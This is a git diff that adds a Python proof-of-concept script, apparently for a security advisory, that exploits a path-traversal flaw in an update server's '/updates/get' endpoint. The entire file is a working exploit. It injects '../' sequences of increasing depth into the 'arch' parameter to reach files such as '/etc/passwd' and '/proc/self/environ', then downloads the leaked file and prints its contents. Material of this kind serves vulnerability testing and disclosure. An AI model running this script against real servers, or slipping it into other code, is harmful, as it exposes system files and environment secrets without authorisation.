diff --git a/rosetta-sdu-2026-0000/poc1.py b/rosetta-sdu-2026-0000/poc1.py
new file mode 100644
index 0000000..076f3f4
--- /dev/null
+++ b/rosetta-sdu-2026-0000/poc1.py
@@ -0,0 +1,42 @@
+import sys
+import json
+from urllib.request import urlopen
+from urllib.error import URLError
+
+url = sys.argv[1] if len(sys.argv) > 1 else "http://UPDSRV:8080"
+url = url.rstrip("/")
+
+targets = [
+    "etc/hostname",
+    "etc/passwd",
+    "proc/1/cmdline",
+    "proc/self/environ",
+    "proc/cpuinfo",
+]
+
+for depth in range(1, 11):
+    up = "/".join([".."] * depth)
+    for target in targets:
+        arch = f"{up}/{target}"
+        params = f"platform=android&arch={arch}&app=1.0.0&kernel=0.0.0"
+        try:
+            with urlopen(f"{url}/updates/get?{params}", timeout=5) as resp:
+                data = json.loads(resp.read())
+        except (URLError, ValueError):
+            continue
+
+        update_needed = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
+        kernel_url = data.get("kernelUrl") or data.get("kernel_url")
+
+        if update_needed and kernel_url and ".." in kernel_url:
+            print(f"Found: {kernel_url}")
+            try:
+                with urlopen(url + kernel_url, timeout=5) as f:
+                    content = f.read().decode("utf-8", errors="replace")
+                    print(content[:1000])
+            except URLError:
+                print("Failed to download file.")
+            sys.exit(0)
+
+print("Not vulnerable")
+sys.exit(1)